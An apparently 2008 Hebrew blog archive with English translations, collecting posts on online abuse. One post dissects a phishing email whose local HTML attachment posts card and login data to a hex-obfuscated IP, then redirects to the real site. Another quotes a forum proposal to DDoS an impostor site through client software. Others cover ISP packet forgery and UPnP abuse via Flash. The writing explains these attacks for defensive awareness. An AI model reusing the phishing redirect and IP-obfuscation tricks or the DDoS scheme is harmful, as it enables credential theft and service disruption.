ארכיון עבור הקטגוריה המלחמה ברשת
נכתב על ידי עמרי בנושא המלחמה ברשת
English translation below.
דייגי זהות המציאו שיטה חדשה שמסתירה בצורה טובה מאוד ממשתמש לא טכנולוגי את המהות של מה שקורה.
בניגוד לדרך המקובלת, בה המשתמש מופנה לאתר של הפישרים, שנראה כמו האתר האמיתי (Paypal, Bank of america וכדומה) - בשיטה החדשה זה מה שקורה:
1. המשתמש מקבל אימייל שנראה כאילו הגיע ממקור אמיתי (במקרה שלי מחברה בשם Moneybookers, שדי דומה לPaypal), האימייל טוען שמסיבות אבטחה ההודעה בקובץ מצורף:
For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.
2. הקובץ המצורף הוא קובץ HTML רגיל לחלוטין, שלא מכיל שום דבר שיהיה קל לזהות בסריקה אוטומטית (היוריסטית), ונראה כמו דף רשמי של Moneybookers,
שמטרתו למנוע גניבת זהות, וכיבוס כספים. מטרות ראויות ללא ספק, מה שעוזר להוריד את ההגנות הפסיכולוגיות של המשתמש שרוצה לעזור.
הדף מקשר ללוגואים וקבצים מהאתר של Moneybookers, מה שמעלה את רמת האמינות הויזואלית שלו.
3. ברגע שהמשתמש ממלא את הפרטים ולוחץ על submit, הנתונים נשלחים לשרת של של הנוכלים, ששומר אותם ומחזיר HTTP 302, שמפנה לשרת של MoneyBookers:
POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0×9f.0xe2.0×3a.0×88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=
HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
יש כמה דברים שכדאי לשים אליהם לב (מודגשים).
* הכתובת של שרת היעד היא 0×9f.0xe2.0×3a.0×88. הדבר המוזר הזה הוא כתובת IP במסווה, מה שמקשה על המשתמשים לזהות מה קורה פה.
* התשובה היא HTTP 302, שמפנה לשרת המאובטח של MoneyBookers, מה שגורם למשתמש לחשוב שלשם הוא הגיע כשהוא לחץ על Submit.
זדוני.
הבעיה פה היא שאי אפשר למנוע מהמשתמשים להריץ קובץ HTML מקומי, ומכיוון שהמשתמשים לא ידעו שעבדו עליהם לא יהיו הרבה דיווחים על העניין, וגם אם יהיו רובם לא ישכילו להבין על מי להתלונן. ולכן כלים אוטומטים כמו זיהוי זיוף רשת של דפדפנים - שמתבסס על שרת מרכזי שאוסף תלונות מהרבה משתמשים - לא יעבדו כמו שצריך כי לא יהיו הרבה תלונות.
========== ENGLISH TRANSLATION ==========
Phishers have come up with a new method to conceal well from non-technical users the essence of what’s happening.
Unlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) - this is what really happens with this approach:
1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:
For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.
2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt - that help lower the user mental defenses that wants to help.
The page links to logos and files from MoneyBookers, a thing which increase it’s visual reliability level.
3. When the user fills up the details and hit submit, the data is posted to the crooks site, which stores them and return HTTP 302, which redirect the user to the MoneyBookers site.
POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0×9f.0xe2.0×3a.0×88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=
HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
A few things to pay attention to (in bold):
* The destination post address is 0×9f.0xe2.0×3a.0×88, which is an IP address in disguise.
* The user is redirected to the real secure MoneyBookers site, which makes him think this is where he have sent his data.
Nasty.
The problem is that you can't prevent the user from running local HTML file, and since the users will not know they have been fooled there will not be many reports about this. that’s why automatic tools like browser web forgery detection - that are based on a central server that collects complaints from many users - will not work well because there will not be many complaints.
 3 תגובות »
לפעמים המציאות עולה על כל דמיון.
חברת דיסקורדיה, שמקושרת למקבילה הצרפתית של RIAA (ארגון חברות ההקלטות האמריקאי) השתלטה בדרך לא ברורה על הדומיין של תוכנת שיתוף הקבצים שראזה והחלה להתחזות לצוות הפיתוח המקורי, תוך שהם משתמשים בלוגו של הפרוייקט ומציעים גרסא "מטופלת" של הקוד של הפרוייקט.
נראה שמדובר בהפרה בוטה של זכויות היוצרים של התוכנה, של הGPL ושל זכויות השימוש בלוגו של התוכנה.
משתמשים מעוצבנים הציעו בפורומים של האתר החדש לשנות את התוכנה כל שתתקוף את האתר המתחזה בבקשות HTTP (מתקפת DDOS - שלילת
שרות מבוזרת).
Make it so the real shareaza program queries their site [shareaza.com] every couple of seconds. As an individual user this won’t take much personal bandwidth. But all shareaza users worldwide put together should be enough to kill their server and they won’t really be able to do much since it will be coming from so many different IPs.
עורכי הדין של החברה הגיבו ואיימו משפטית על מנהלי הפורום וכל כל מי שיפתח מתקפת שלילת שרות כזו (אני מעריך את מאמץ הפיתוח הנדרש בכחמש דקות כולל בדיקות QA מקיפות).
This law firm represents Discordia, Ltd., the operator of the website Shareaza.com and owner of the rights in the Shareaza branded software distributed from that domain. Please be advised, that your forum contains a string of posts under the title: “suggestion to kill Shareaza.com.” Under the string, the poster, RedSquirrel offers directions for users of Shareaza software to implement a DoS that would have the effect of destroying or seriously impairing our client’s application and network. The poster OldDeath also offers a manner to illegally attack our client’s business.
Despite whatever complaints your forum’s users may have with our client’s proper and legal business activities, the type of activity promoted on your forum is illegal. Therefore, we request that you immediately remove this string of posts and any future strings of this nature. My client respects your users’ rights to express their points of view. However, the line is crossed when users begin to promote the destruction of a legitimate business (evidently based on out some misguided belief that artists and others who create music should not be fairly compensated for their efforts) via illegal or other predatory means.
If the above cited illegal activity on your site does not immediately cease and desist, our client will take all necessary action to vigorously and relentlessly protect its rights. To be clear, if this action is not immediately taken and, as result, our client’s business is harmed, we will not only pursue, locate and hold fully responsible each and every one of those who have implemented this, or any similar DoS, but also those responsible for maintaining your site and the forums.
Please confirm that the requested action is being taken immediately.
Jeffrey A. Kimmel
Meister Seelig & Fein, LLP
140 E. 45th St., 19th Fl.
New York, NY 10017
(212) 655-3578
מי שיכנס כרגע עם פיירפוקס לאתר החטוף יגלה שפיירפוקס מזהיר אותו מפני חשד לאתר מזויף.
זה תוצאה ישירה של מאמץ נוסף שמאורגן בפורום להתלונן על האתר המזוייף בגוגל, שבינתיים הצליח להכניס אותו לרשימת האתרים החשודים.
הסיפור המלא כאן.
8 תגובות »
012 סמייל קווי זהב (או איך שלא קוראים להם היום), שנולדו מהרכישה של 012 על ידי אינטרנט זהב נחשדים בזיוף של תעבורה אינטרנט שנועדה לגרום להחרמה של משתמשי TorrentLeech.
בעבר היו לי לא מעט בעיות מהירות עם אינטרנט זהב שהסתיימו כשהתנתקתי מהם.
כבר בעבר חשדתי שאינטרנט זהב משתמשת בטכניקות מסויימות כדי לפגוע בקצב ההעלאה של משתמשים, ואם הטענות של מנהלי TorrentLeech נכונות, אז 012 סמייל קווי זהב (או איך שלא קוראים להם היום) עברו את הגבול הדק שבין ניהול משאבים על גבול הלגיטימי לזיוף נתונים כדי להפיק רווחים, פעולה פלילית ללא ספק.
יש דמיון עקרוני רב בין המקרה של Comcast, שזייפו חבילות RST שנועדו לגרום לצד השני לחשוב שהצד המחובר סגר את החיבור לבין מה שסמייל קווי זהב (או איך שלא קוראים להם היום) נחשדים בו.
הייתי אומר שהפתרון של Comcast יותר מתוחכם טכנולוגית ויותר קשה לזיהוי ושהפתרון של 012 (או איך בלה בלה) יותר גס טכנולוגית אבל יותר נבזי בהרבה.
הסיבה היא שהפתרון של 012 (בלה) נועד לגרום לשרתי TorrentLeech לחשוד שהמשתמש מנסה לגרום לאתר לחשוב שהוא העלה כמויות נתונים גדולות ולא סבירות במטרה לגרום להחרמתו מהאתר.
זו מתקפה מאוד ספציפית על משתמשי TorrentLeech, ואם זה אכן קרה, אני מצפה שכל משתמשי TorrentLeech שמחוברים דרך 012 (בלה) יתנתקו ויעברו לספק שלא חוסם/מגביל/מרמה/משקר/עובר על החוק (עדיין?) כמו בזק-בין-לאומי.
הערה:
הטענה של TorrentLeech לא הוכחה עדיין.
הנה ההודעה המקורית של TorrentLeech:
2008-01-24 - ISRAEL USERS
Unfortunately it seems, that a few Israeli ISPs, are intensionally altering the announces to our tracker of their clients, announcing to our tracker false stats (over 8.000.000 TB of upload and download) in order for these users to be probably banned (and save some bandwidth). We made a script to automatically detect this false announce, and reset the user’s account (reset uploaded/downloaded). Although this is NOT a fix, only a temporary solution, we cannot do anything more from our part, since this is not a problem of our tracker. We know that reseting these accounts is not pleasant, but the other alternatives were to ban these accounts or to ban all the Israel Golden Lines ip block (which unfortunately seems very possible in the future, since our tracker gets hammered because of the problem above)
Seems most of the users having this problem use the ISP-> GOLDENLINES
9 תגובות »
UPNP היא טכנולוגיה שנועדה לפשט את התהליך של הוספת שרתים ונקודות קצה לרשת. אחד השימושים הפופולריים של UPNP הוא לאפשר קידום פורטים אוטומטי.
נניח שיש לכם רשת מקומית קטנה מאחורי NAT (תצורה מאוד נפוצה בימינו, כמעט כל מחשב שמחובר לאינטרנט דרך נתב מהווה בעצם רשת מקומית כזו), ותוכנת שיתוף באחד המחשבים רוצה לאפשר התחברות אליה מבחוץ.
לפני UPNP, התוכנה לא תוכל לעשות את זה בעצמה, ומנהל המערכת (או המשתמש התמים שקנה את הנתב) יצטרך להגדיר את הנתב "ולפתוח פורטים", או ליתר דיוק - לקדם פורטים מסויימים אל המכונה הספציפית.
היום רוב הנתבים תומכים בUPNP, מה שמאפשר לתוכנת השיתוף למצוא את הנתב, לגלות שהוא תומך בקידום פורטים, ולבקש ממנו בדרכי נועם לקדם למחשב עליו היא רצה חבילות מידע שמגיעות לפורטים מסויימים.
מאוד נוח, הכל פשוט עובד.
הבעיה היא שUPNP לא כולל אימות (כי אחרת המשתמש היה צריך להגדיר שם משתמש וסיסמא בנתב לצרכים האלו, ולתת לתוכנת השיתוף את שם המשתמש והסיסמא, דבר לא נוח בעליל!) ולמעשה מאפשר לכל תוכנה שרצה של מחשב בתוך הרשת לבקש קידום פורטים בלי בקרה מיוחדת ובצורה שקופה ונסתרת מהמשתמש.
הבעיה מתחילה כהמשתמש מריץ תוכנה בלי להבין אפילו שזה מה שהוא עושה.
למשל, אתם גולשים לתומכם באינטרנט, בטוחים שהתוכנה היחידה שאתם מפעילים היא הדפדפן, אתם נכנסים לדף כלשהו שמציג אנימציית פלאש.
הופ, הרצתם תוכנה חיצונית.
לא הפלאש, אלא האנימציה עצמה.
בצורה דומה הפעלה של ישומון ג'אווה היא בעצם הפעלה של תוכנה חיצונית בתוך הרשת שלהם. במקרה של ג'אווה המצב עוד יחסית בסדר כי רק ישומונים חתומים יכולים להתחבר לשרתים אחרים מזה שהם ירדו ממנו (ישומים חתומים הם נדירים למדי כי כדי לחתום יש לרכוש חתימה מסמכות שורש כמו Verisign או Thawte, מה שעולה כמה מאות דולרים לשנה ויאפשר זיהוי של מקור הקוד).
לעניין, פלאש מאפשר התחברות לנתב ובקשה לקידום פורטים, בנוסף UPNP מאפשר בנתבים מסויימים לשנות את שרת הDNS של הנתב, מה שיכול לאפשר תכמון של המשתמש ברמות בלתי נתפסות.
מכיוון שכל נתב שנרכש בשנים האחרונות מתהדר בתמיכה בUPNP שמופעלת בדרך כלל כברירת מחדל, הבעיה די חמורה.
מומחי אבטחה מנסים לשכנע אנשים מזה שנים שנתב NAT הוא לא Firewall, אבל רוב האנשים לא מבחינים בהבדל. מבחינתם אם הם מאחורי נתב הם בטוחים והנתב הוא זה שיספוג את ההתקפות.
אז זהו, שלא.
למעשה, ווקטור ההתקפה הזה מנצל את האמון שאנחנו רוכשים למחשבים בתוך הרשת.
למשל, שרותים מקומים רבים מאפשרים התחברות מהמחשב המקומי בלבד (ובודקים שההתחברות מגיעה מהמחשב המקומי). הפעלת פלאש תמימה (ונסתרת) יכולה לעקוף את ההגנה הזו בקלילות (ואם פלאש עדיין לא תומך בקישוריות UDP/TCP, הוא בטח יתמוך בגרסאות הבאות).
מומלץ לנטרל את התמיכה בUPNP בנתב שלכם.
ההתקפה הודגמה בGnuCitizen.
11 תגובות »
ספק האינטרנט השני בגודלו בארצות הברית - Comcast, חוסם בצורה פעילה תקשורת ביט-טורנט.
החסימה מתרחשת בטכניקה דומה לזו של חומת האש הסינית, כלומר - קומקאסט מזייפים חבילות מידע שמשמשת לניתוק חיבור TCP (עם דגל RST דלוק) מכל אחד מהצדדים, וגורמים לשני הצדדים לחשוב שהצד השני רוצה לסגור את הקשר.
הניתוק מתבצע ברגע שהם מזהים שאחד הצדדים מציע קובץ שלם להורדה (Seed), ואין ספק שהוא פוגע באיכות השירות של משתמשי הפרוטוקול בקומקאסט.
למותר לציין שהחסימה פוגעת גם במשתמשים שעושים שימושים לגיטימיים בפרוטוקול, כמו הפצה של תוכן חוקי (למשל מפיק שרוצה להפיץ את הסרט החדש שלו בביט-טורנט תוך שימוש בחיבור של קומקאסט) , הפצת לינוקס וכדומה.
אפשר להתגבר על החסימה באמצעות הצפנה של התקשורת (כל לקוח ביט-טורנט מודרני תומך בזה), מה שיקשה על קומקאסט לזהות שמדובר בתעבורת ביט-טורנט, אבל לא ימנע מהם לשלוח חבילות RST מכיוון שמעטפת הIP עדיין לא מוצפנת.
אפשר לראות איך נוצרת פה ברית טכנולוגית בין גורמים שמטרתם, כל אחד מסיבותיו, לשלוט בתעבורת המידע ברשת, ומנגד - איך הטכנולוגיה שמאפשרת למידע להשאר חופשי מתחזקת בעקבות כך.
8 תגובות »
מזה מספר חודשים אני רואה בפיירסטטס של firestats.cc זרימה הולכת וגוברת הפניות חיפוש ממנוע החיפוש של מיקרוסופט:
מסתבר שההפניות, שמכילות UserAgent מזוייף ודף מפנה מזוייף (עם מילות חיפוש שלא באמת מובילות אלי), יוצאות - תאמינו או לא - משרתי מייקרוסופט.
יש שני טווחי כתובות IP שמהן יוצאות הבקשות:
65.55.165.*
131.107.151.*
מסתבר שאני לא היחיד שזה הרגיז אותו. תגובת מייקרוסופט על פי הודעה בפורום שקישרתי אליו:
Second, we want to explain what this is all about. The traffic you are seeing is part of a quality check we run on selected pages. While we work on
addressing your conerns, we would request that you do not actively block the IP addreses used by this quality check; blocking these IP addresses could prevent your site from being included in the Live Search index.
אז מייקרוסופט מודים שזה הם (כאילו הם יכלו להסתתר באמת), וטוענים - תחזיקו - שהם עושים לדפים נבחרים בדיקת איכות!
ואו, הרבה תודה מייקרוסופט, עכשיו שבדקתם את איכות הדפים שלי (תודה תודה!), אתם מוכנים (תודה!) להפסיק לזבל לי את הסטטיסטיקות בצואה דיגיטלית?
(הממ, צואה דיגיטלית = דואה?)
מה שיפה זה שהם טוענים שאם תחסמו את כתובות הIP האלו, אתם עלולים לא להיות מאונדקסים על ידי הזחלנים של מנוע החיפוש של מייקרוסופט.
אכן טרגדיה, הרי אני מקבל כל כך הרבה הפניות משם שפשוט חבל לחסום אותו, כהוכחה - ראו את התמונה המצורפת למעלה, כמעט כל ההפניות מLive!
אגב, ניתן לזהות בקלות שאלו הפניות מאותה חווה גם על פי הדף המפנה, שמכיל תמיד את המילה LIVOP, למשל:
http://search.live.com/results.aspx?q=custom&mrt=en-us&FORM=LIVSOP
נראה שהתעלמות מטווח של כתובות IP יהיה אחד הפיצ'רים של הגרסא הבאה של פיירסטטס.
מייקרוספט, אני באמת מציע לכם לתפוס את הגאון שיזם את המהלך הזה ולקדם אותו, אסור לו לגעת במחשבים!
7 תגובות »
נכתב על ידי עמרי בנושא המלחמה ברשת
זוכרים שקיבלתי בוקר בהיר אחד 230 כרטיסי ברכה מאיזה ספאמר באתר של פיירסטטס?
זוכרים שהלשנתי עליו לICANN שפרטי הWho is שלו היו שגויים?
אני שכחתי, אז הנה תזכורת.
הפניה המקורית:
Errors in Technical Contact Information:
Address:INCORRECT
Description:
missing information
Explanation:
Site advertise in using spam bots, I received over 200 spam tickets in my trac system at http://firestats.cc (my site) that advertise this site last night.
Please delete the site.
היום בבוקר קיבלתי מICANN אימייל שמבקש שאני אבדוק אם הפרטים תוקנו (אני מניח שאין להם כוח אדם לבדוק בעצמם).
הנתונים אומרים שהתאר מושעה בגלל נתונים שגויים, והאתר מת, אז נראה שהספאמר לא טרח לתקן.
אני יודע שלספאמרים יש אתרים כמו בוטנים, וזה שלא ממש מזיז להם, אבל אני מרוצה כי הצלחתי בכמה דקות עבודה לסגור לחולרע את האתר.
רוצים גם?
תמצאו פרט חסר או שגוי בפרטי הWhois של האתר ודווחו עליו פה, וגלגלי הצדק האיטיים אך העיקשים יתחילו להסתובב.
תגובה אחת »
נכתב על ידי עמרי בנושא המלחמה ברשת
זו לא הפעם הראשונה שהאינטרנט הופך לשדה קרב בין כוחות השחור לכוחות האור.
בתקופה האחרונה נראה שהתקפות בפרופיל גבוה הופכות להיות יותר ויותר נפוצות, מי זוכר היום את בלו-סקוריטי ז"ל שניסתה לפתח צפרדע כחולה ומבוזרת שתלחם בספאמרים?
לא תמיד המתקפות קוצרות כזו הצלחה, EveryDNS למשל עדיין מתפקדים היטב למרות ההתקפה האחרונה (למעשה אני משתמש בשרותים של EveryDNS, ואפילו תרמתי 15$).
הפעם הקורבנות הם מספר אתרים שנלחמים בסקאמרים, שהם האחים הגדולים של הספאמרים.
מכירים את האתרים שמתחזים לאתרים אחרים בנסיון לקצור סיסמאות של בנקים, Paypal Ebay וכו'?
אלו אתרים שמופעלים על ידי סקאמרים - Scammers או Scumbags כמו שהם מכונים בחוגים מסויימים.
סקאמרים אחרים לא מפחדים ללכלך את הידיים כדי לנסות להוציא כסף מהקורבנות, וממש לדבר איתם ולהשקיע בהם זמן ומאמץ - אלו כמובן הסקאמרים שמפעלים את העוקץ הניגרי, הידוע גם בשם תרמית ה419 (על שם מספר הקטע בחוק הניגרי שמתייחס לעברה).
הפעם האתרים שהותקפו הם אתרים שנלחמים ישירות בעוקצים הניגרים, כמו 419eaters, scamwarners וaa419.
האתרים לא זמינים כרגע עקב ההתקפה.
קל למי ששולט על רשת של עשרות או מאות אלפי בוטים להפיל שרת במתקפת שלילת שרות; כל מה שהוא צריך לעשות זה זה להורות לכל הבוטים לבקש דפים בו זמנית מאותו השרת.
התקפה כזו תספיק כדי להפיל כמעט כל שרת באינטרנט.
למעשה, היחידים שיכולים לעמוד במתקפה כזו הם חברות גדולות בעלות מודעות לאפשרות שלה, שגם השקיעו הרבה כדי להתגונן בפניה מראש.
חברות כאלו (גוגל, מייקרוסופט, יאהו, אמאזון וכו') יוכלו לעמוד במתקפה כי מערכת השרתים שלהם עצמה מבוזרת, ככה שעוצמת ההתקפה מתפזרת על פני כמות גדולה של שרתים, מה שהופך את ההתקפה להרבה פחות יעילה.
טיעונים בנוסח "זה סימן שאנחנו מכאיבים להם" ממש לא עושים עלי רושם, אנלוגיה דומה תהיה שהנמלים יצהלו כשיבוא המרסס כי "אנחנו מכאיבים להם".
למעשה, הרעים מנצחים פה. זה שאותם אתרים הכאיבו מספיק לסקאמרים כדי לפעול לא אומר שהם ממש פגעו להם בכיס (זה שמעכתם עכביש זה לא אומר שהוא הכניס אתכם למינוס בבנק).
אז מה עושים?
זו מלחמה, וכמו בכל מלחמה צריך לפעול בכמה חזיתות.
1. צריך גיבוי טכנולוגי וכלכלי לאתרים שנלחמים בטינופות, אולי על ידי מדינות ואולי על ידי חברות גדולות שרוצות לעשות משהו טוב כדי להצטייר טוב.
2. צריך להלחם ברשתות הבוטים, זו בעיה אמיתית וקשה שצריכה התייחסות של רשויות החוק בעולם. למרות השיפור הטכנולוגי המרשים בבוטים (היום הבוטים מתקשרים בערוצים מוצפנים, והם מתוכננים עם יתירות (Redeundancy) בערוצי השליטה שלהם - עדיין אפשר לגלות הרבה מאוד פשוט על ידי הדבקה של מחשב בבוט כזה וסקירה של פעילות הרשת שלו.
אני חושב שהגיע הזמן שהאיום הזה יתחיל לקבל התייחסות רצינית, הרי באותה קלות שמפעילי רשתות הבוטים יכולים להפיל אתר אחד, הם יכולים להפיל אתר אחר. מישהו רוצה להמר כמה עמיד יהיו האתרים של הבית הלבן, הפנטגון או האתר של ממשלת ישראל בפני התקפה כזו?
3. צריך לבזר את המנגנונים שנלחמים בסקאמרים ובספאמרים: מה שעובד בשביל הרעים יכול לעבוד גם בשביל הטובים. זה אומנם הרבה יותר קשה הנדסית, אבל בהחלט אפשרי בהרבה מקרים.
דרך סלאשדוט.
3 תגובות »
נכתב על ידי עמרי בנושא שינאה, המלחמה ברשת
אזהרה: פוסט מתבכיין.
יום מחורבן למדי עבר על כוחותינו, הוא התחיל בזה שהיו לי 230 תגובות ספאם חדשות לטיקטים בפיירסטטס - מסתבר שהספאמרים מצאו דרך לרמות את הספאם פילטר של trac, והפציצו הרבה אתרי trac בזבל.
בין האתרים האחרים שנפגעו (ואלו הם רק אלו ששמעתי עליהם בערוץ הIRC של trac ברבע שעה שביליתי שם בבוקר) נמנים trac-hacks וpidgin. אני מחקתי את מאות התגובות פשוט על ידי שחזור של בסיס הנתונים מגיבוי מאתמול, אבל זה עיצבן אותי מספיק כדי שאני אכנס לאתר של הספאמר, אמצא ליקוי בפרטי הwhois שלו (אין כתובת), ואלשין עליו לICANN.
בתקווה הם יעיפו אותו מהרשת לתמיד.
אחרי יום די מתיש בעבודה, שכלל הדרכה על רשתות דור שלישי סלולריות (מעניין, אבל מדובר במצגת של 170 עמודים שהעבירו לנו - אז זה לא היה קל), זזתי הביתה, רק כדי להכנס לפקק ממש בתחילת איילון (ישר אחרי הירידה לאיילון דרום ממחלף גלילות החדש). הפקק המחורבן בעצם היה כל איילון, ולמרות שברחתי ממנו ברוקח (כדי לחתוך דרך רמת-גן במקביל לאיילון) כל הסיפור לקח לי שעה ועשרים דקות.
שעה ועשרים!
כבר הייתי עושה את זה בזחילה.
10 תגובות »
|
רסיסים (RSS)